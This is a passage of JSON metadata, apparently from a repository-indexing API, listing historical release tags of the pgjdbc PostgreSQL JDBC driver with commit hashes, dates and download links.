v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_1_409","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_1_409/manifests"},{"name":"REL8_0_319","sha":"859fe40b52d5e8c44184c19015bd1836478c7355","kind":"commit","published_at":"2007-04-18T08:13:26.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL8_0_319","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL8_0_319","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL8_0_319","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_0_319","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_0_319/manifests"},{"name":"REL8_2_504","sha":"80b0ce1be968813de3d56ff1670857015ce6862f","kind":"commit","published_at":"2006-12-01T12:02:39.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL8_2_504","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL8_2_504","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL8_2_504","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_2_504","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_2_504/manifests"},{"name":"REL8_1_408","sha":"db52e0e583a7b8af7c7d5da34f50c8f965baec6f","kind":"commit","published_at":"2006-12-01T11:57:03.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL8_1_408","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL8_1_408","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL8_1_408","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_1_408","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_1_408/manifests"},{"name":"REL8_0_318","sha":"50466b1014fd76ec445abe26b234c13dc7c0f338","kind":"commit","published_at":"2006-12-01T11:54:54.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL8_0_318","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL8_0_318","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL8_0_318","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_0_318","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_0_318/manifests"},{"name":"REL8_0_317","sha":"7bab436cbec9baec3cd36c6d320cdc4402fd718c","kind":"commit","published_at":"2006-05-23T23:07:39.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL8_0_317","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL8_0_317","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL8_0_317","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_0_317","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_0_317/manifests"},{"name":"REL8_1_407","sha":"d9e844e0f120b4401e178392c6d4293ac5e7d3cd","kind":"commit","published_at":"2006-05-23T23:07:09.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL8_1_407","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL8_1_407","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL8_1_407","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_1_407","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_1_407/manifests"},{"name":"REL8_0_316","sha":"027669dc50a5266603367853ba6a5a9e5fba91bd","kind":"commit","published_at":"2006-05-22T10:08:50.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL8_0_316","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL8_0_316","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL8_0_316","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_0_316","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_0_316/manifests"},{"name":"REL8_1_406","sha":"6b082944901866105f620900867a0e7eb8b96d91","kind":"commit","published_at":"2006-05-22T10:08:35.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL8_1_406","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL8_1_406","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL8_1_406","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_1_406","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_1_406/manifests"},{"name":"REL8_1_405","sha":"5dbd05a49a9c17f00528d7c8d885cfdeaacf3ad9","kind":"commit","published_at":"2006-02-09T17:04:38.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL8_1_405","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL8_1_405","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL8_1_405","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_1_405","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_1_405/manifests"},{"name":"REL8_0_315","sha":"90ed05f956d7269066a591086d9431191affa7bb","kind":"commit","published_at":"2006-02-09T17:04:06.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL8_0_315","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL8_0_315","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL8_0_315","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_0_315","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_0_315/manifests"},{"name":"REL8_1_404","sha":"d3f28b54df40c3eae08305d51d0219c689de4797","kind":"commit","published_at":"2005-11-06T06:45:13.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL8_1_404","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL8_1_404","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL8_1_404","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_1_404","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_1_404/manifests"},{"name":"REL8_0_314","sha":"5f21e4fa065eeb8719ff8f0ce593c9337f9d0335","kind":"commit","published_at":"2005-11-06T06:41:45.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL8_0_314","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL8_0_314","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL8_0_314","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_0_314","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_0_314/manifests"},{"name":"REL8_0_313","sha":"9cac940139c5c0f95a18199600309ed276daf0d5","kind":"commit","published_at":"2005-10-07T06:08:40.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL8_0_313","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL8_0_313","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL8_0_313","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_0_313","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_0_313/manifests"},{"name":"REL8_0_312","sha":"3ae53db8d3ca58443540e6e371e14027d3d85a0b","kind":"commit","published_at":"2005-07-24T11:05:11.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL8_0_312","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL8_0_312","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL8_0_312","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_0_312","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_0_312/manifests"},{"name":"REL8_0_311","sha":"ac526695a77433ceea00e1f8b4a9ba710607d2f2","kind":"commit","published_at":"2005-04-11T04:45:13.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL8_0_311","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL8_0_311","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL8_0_311","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_0_311","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_0_311/manifests"},{"name":"REL8_0_310","sha":"29a41dac2a3025af1d759924fcbd688cd9c8ee25","kind":"commit","published_at":"2005-02-02T20:08:22.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL8_0_310","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL8_0_310","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL8_0_310","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_0_310","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_0_310/manifests"},{"name":"REL8_0_309","sha":"389b1a118b97418bd72ef30e4e6534d5987faa60","kind":"commit","published_at":"2005-01-17T11:09:41.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL8_0_309","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL8_0_309","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL8_0_309","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_0_309","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_0_309/manifests"},{"name":"REL7_4_1","sha":"2d3f36805608aa2a41d3fc85c7bc0c1e43dfb0b3","kind":"commit","published_at":"2003-12-18T04:18:15.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL7_4_1","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL7_4_1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL7_4_1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL7_4_1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL7_4_1/manifests"},{"name":"REL7_4","sha":"76a1ece07b1d3f4110d6522ce7eaf9c382316125","kind":"commit","published_at":"2003-11-15T10:20:02.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL7_4","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL7_4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL7_4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL7_4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL7_4/manifests"},{"name":"REL7_4_RC2","sha":"00f63c8f0632ef0539d0cf0e6ac1f7ad00d28574","kind":"commit","published_at":"2003-10-30T12:18:56.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL7_4_RC2","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL7_4_RC2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL7_4_RC2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL7_4_RC2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL7_4_RC2/manifests"},{"name":"REL7_4_RC1","sha":"00f63c8f0632ef0539d0cf0e6ac1f7ad00d28574","kind":"commit","published_at":"2003-10-30T12:18:56.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL7_4_RC1","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL7_4_RC1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL7_4_RC1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL7_4_RC1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL7_4_RC1/manifests"},{"name":"REL7_4_BETA5","sha":"8115d542320a2c6cccb5e28640991b3bd6107ad6","kind":"commit","published_at":"2003-10-15T09:39:04.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL7_4_BETA5","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL7_4_BETA5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL7_4_BETA5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL7_4_BETA5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL7_4_BETA5/manifests"},{"name":"REL7_4_BETA4","sha":"67fffc6579b15aadb6567cdad3d7b07360f37912","kind":"commit","published_at":"2003-09-23T06:13:52.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL7_4_BETA4","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL7_4_BETA4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL7_4_BETA4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL7_4_BETA4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL7_4_BETA4/manifests"},{"name":"REL7_4_BETA3","sha":"3f65d0b145f09a2f9ed09f53500f63efde8eb3f4","kind":"commit","published_at":"2003-09-13T04:02:16.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL7_4_BETA3","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL7_4_BETA3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL7_4_BETA3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL7_4_BETA3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL7_4_BETA3/manifests"},{"name":"REL7_4_BETA2","sha":"7d4ef49d60406717eab1291c0cf6af65464e13bf","kind":"commit","published_at":"2003-08-26T06:50:39.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL7_4_BETA2","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL7_4_BETA2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL7_4_BETA2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL7_4_BETA2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL7_4_BETA2/manifests"},{"name":"REL7_3_5","sha":"b7556b365129f5076b40e8721a0b0318d4fb5ac3","kind":"commit","published_at":"2003-08-07T17:56:27.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL7_3_5","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL7_3_5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL7_3_5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL7_3_5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL7_3_5/manifests"},{"name":"REL7_4_BETA1","sha":"ad2546260b21f17f5ad096010f1a80790108f3cd","kind":"commit","published_at":"2003-07-24T00:30:39.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL7_4_BETA1","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL7_4_BETA1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL7_4_BETA1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL7_4_BETA1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL7_4_BETA1/manifests"},{"name":"REL7_3_4","sha":"433b7b97da262eb863e59b29161f9691a7e624c8","kind":"commit","published_at":"2003-07-23T23:34:31.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL7_3_4","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL7_3_4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL7_3_4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL7_3_4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL7_3_4/manifests"},{"name":"REL7_3_2","sha":"93d0ed7240e64ecfaaeb7e689594dc878125fd36","kind":"commit","published_at":"2003-01-14T09:40:48.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL7_3_2","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL7_3_2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL7_3_2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL7_3_2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL7_3_2/manifests"},{"name":"REL7_2_4","sha":"f4cfb708fe309ef501e76713bc447f878c1dff79","kind":"commit","published_at":"2002-01-18T17:21:51.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL7_2_4","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL7_2_4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL7_2_4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL7_2_4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL7_2_4/manifests"},{"name":"REL7_2_3","sha":"f4cfb708fe309ef501e76713bc447f878c1dff79","kind":"commit","published_at":"2002-01-18T17:21:51.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL7_2_3","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL7_2_3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL7_2_3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL7_2_3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL7_2_3/manifests"},{"name":"REL7_2","sha":"f4cfb708fe309ef501e76713bc447f878c1dff79","kind":"commit","published_at":"2002-01-18T17:21:51.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL7_2","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL7_2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL7_2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL7_2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL7_2/manifests"},{"name":"REL7_2_RC2","sha":"f4cfb708fe309ef501e76713bc447f878c1dff79","kind":"commit","published_at":"2002-01-18T17:21:51.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL7_2_RC2","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL7_2_RC2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL7_2_RC2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL7_2_RC2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL7_2_RC2/manifests"},{"name":"REL7_2_RC1","sha":"f4cfb708fe309ef501e76713bc447f878c1dff79","kind":"commit","published_at":"2002-01-18T17:21:51.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL7_2_RC1","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL7_2_RC1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL7_2_RC1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL7_2_RC1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL7_2_RC1/manifests"},{"name":"REL7_2_BETA5","sha":"74b58ea9308a8d0afa06c4da53967eccbe10f955","kind":"commit","published_at":"2002-01-05T22:26:23.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL7_2_BETA5","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL7_2_BETA5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL7_2_BETA5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL7_2_BETA5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL7_2_BETA5/manifests"},{"name":"REL7_2_BETA4","sha":"7b96aee64942e2b041820d2c8a6a95c8ac79dfdb","kind":"commit","published_at":"2001-12-11T04:48:05.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL7_2_BETA4","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL7_2_BETA4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL7_2_BETA4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL7_2_BETA4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL7_2_BETA4/manifests"},{"name":"REL7_2_BETA3","sha":"855287de30b689e315b435f79f3b8fd066dd5ac8","kind":"commit","published_at":"2001-11-19T23:19:21.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL7_2_BETA3","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL7_2_BETA3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL7_2_BETA3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL7_2_BETA3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL7_2_BETA3/manifests"},{"name":"REL7_2_BETA2","sha":"42c01a77e1e0be5f5b2d631fef5b3d46c2dbb7c2","kind":"commit","published_at":"2001-11-02T23:51:18.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL7_2_BETA2","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL7_2_BETA2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL7_2_BETA2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL7_2_BETA2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL7_2_BETA2/manifests"},{"name":"REL7_2_BETA1","sha":"72a1e406d24746a658be7672b311a73bb3d815a3","kind":"commit","published_at":"2001-10-25T06:00:05.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL7_2_BETA1","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL7_2_BETA1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL7_2_BETA1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL7_2_BETA1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL7_2_BETA1/manifests"},{"name":"REL7_1_2","sha":"78eb5549506b35d6bd13b915f34c49ec604f1f7c","kind":"commit","published_at":"2001-05-12T20:45:45.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL7_1_2","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL7_1_2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL7_1_2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL7_1_2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL7_1_2/manifests"},{"name":"REL7_1","sha":"2c56fd4ae7a9e300c5c5bba754659949874af2c2","kind":"commit","published_at":"2001-03-19T21:57:09.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL7_1","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL7_1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL7_1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL7_1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL7_1/manifests"},{"name":"REL7_1_BETA3","sha":"a55bb6d16837bda30929f56c9b866bcd98ffe87f","kind":"commit","published_at":"2000-12-28T23:56:46.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL7_1_BETA3","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL7_1_BETA3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL7_1_BETA3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL7_1_BETA3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/G